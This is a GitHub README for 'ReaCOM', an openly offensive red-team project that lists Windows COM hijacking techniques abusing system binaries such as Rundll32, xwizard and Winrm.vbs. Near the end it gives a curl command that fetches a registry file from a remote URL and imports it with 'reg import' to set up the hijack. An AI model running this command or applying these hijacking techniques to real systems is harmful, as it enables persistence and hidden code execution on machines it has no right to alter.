Skip to content

Latest commit

 

History

History
100 lines (79 loc) · 4.07 KB

README.md

File metadata and controls

100 lines (79 loc) · 4.07 KB

ReaCOM project

Runonce.exe/COM Hijacking URLProtocol/COMHijacking Openwith.exe/COMHijacking Rundll32/CLSID
xwizard/CLSID DLL/CLSID MMC/CLSID
Explorer.exe/COMHijacking Scripetlet/File Powershell/CLSID
Verclsid.exe Winrm.vbs Winrm.cmd
Prncnfg.vbs Prnport.vbs Being implmented
Being implmented Being implmented Being implmented
Being implmented Being implmented Being implmented
Being implmented Being implmented Being implmented
Being implmented Being implmented Being implmented
Being implmented Being implmented

ReaCOM

ReaCOM is the project that has a multiple of contributes to understand component object model. It provides you more than one tool to use COM. This project is based on Scriptlet, which it means, All of the tools that you would like to use from my project are based on Scriptllet execution.

ReaCOM targets COM techniques from different types of use and shows some research from different authors, COM object is one of the most popular techniques for the red team in twitter and everywhere, so that we are all here to show some tools can do hijacking COM objects and execute its code by abusing some tools in system operating.

Ackknowledgement

General Acknowledgement

Thanks everyone for working together to find these great tools.

  • Start using COM technique after watching this

To enjoy hijacking you need to do the steps below:

  • Downloading registry file
  • Importing registry file
  • Taking a look and learning how Scriptlet works.

GIF

The command used in the gif is below:

curl.exe --remote-time https://raw.githubusercontent.com/homjxi0e/ReaCOM/master/Classes/COMScripetlet.reg --write-out rrr.reg --output tttt.reg; echo '' '' ; reg import .\tttt.reg

(Useful references)